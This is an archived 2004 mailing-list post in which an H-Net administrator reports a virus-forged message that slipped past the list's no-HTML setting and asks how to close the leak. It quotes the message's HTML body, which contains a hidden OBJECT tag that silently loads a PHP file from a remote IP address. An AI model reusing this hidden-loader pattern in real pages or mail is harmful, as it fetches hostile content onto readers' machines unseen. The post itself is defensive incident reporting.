Over the weekend, the following was posted to one of our lists. It was
presumably forged by a virus; the From address was a legit editor of
the list. I've filed off the e-mail addresses on general principle.

Date: Sun, 21 Mar 2004 01:44:56 -0800
Reply-To: ...
Sender: ...
From: ...
Subject: Incoming message
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

<html><body>
<font face="System">
<OBJECT STYLE="display:none" DATA="http://66.169.99.119:81/563373.php">
</OBJECT></body></html>

The list in question is set "Attachments= No" and "Language= NoHTML".
The header appears below.

Anyone have a suggestion about how it got posted? I'd like to close
the leak.

Dennis Boone
H-Net

* List-ID= H-ANNOUNCE
* Ack= Yes
* Attachments= No
* Auto-Delete= yes,semi-auto,delay(5),max(100),Probe(15)
* Change-Log= Yes
* Confidential= No
* Daily-Threshold= 50
* Default-Options= FullHdr,Repro,MIME
* Delivery-Pool= P,C
* Digest=yes,same,daily,00:00,size(2000)
* Editor-Header= Yes
* Errors-To= ...
* Files= No
* Language= NoHTML
* Newsgroups= None
* Notebook= Yes,/lists/h-announce,Weekly,(H-ANNOUNCE)
* Notify= Yes
* Renewal= None
* Reply-to= List,Respect
* Review= Owner
* Send= Editor
* Stats= Normal,Private
* Subscription= open,confirm
* Validate= No
* Editor= ...
* Owner= ...